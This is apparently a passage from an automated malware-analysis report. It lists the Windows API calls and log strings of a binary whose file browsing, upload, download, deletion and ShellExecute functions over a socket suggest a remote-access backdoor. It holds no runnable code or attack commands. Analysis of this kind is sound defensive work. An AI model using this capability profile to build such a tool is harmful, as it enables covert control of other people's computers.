                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                                                                  • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                                                                  • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                                                                  • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6D195DF8,?,?,?,?,?,00000055), ref: 004046AC
                                                                                • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                                                                  • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                                                                  • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                                                                  • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                                                                  • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                  • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                  • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                                                                • API String ID: 1698304352-2559757301
                                                                                • Opcode ID: 4534f3061b2a73a9a8328c332a5244eb0c0100669159570fe693710d213d51e3
                                                                                • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                                                                • Opcode Fuzzy Hash: 4534f3061b2a73a9a8328c332a5244eb0c0100669159570fe693710d213d51e3
                                                                                • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404783
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                                                                • #23.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                                                                • #4.WS2_32(00000000,0041B320,00000010,00000000,00000001,00000006), ref: 004047C2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                                                                • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                                                                • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                                                                • wcscmp.MSVCRT ref: 00404924
                                                                                • wcscmp.MSVCRT ref: 0040493C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,00018426), ref: 00404C1F
                                                                                  • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,00018426), ref: 00404C2F
                                                                                  • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C39
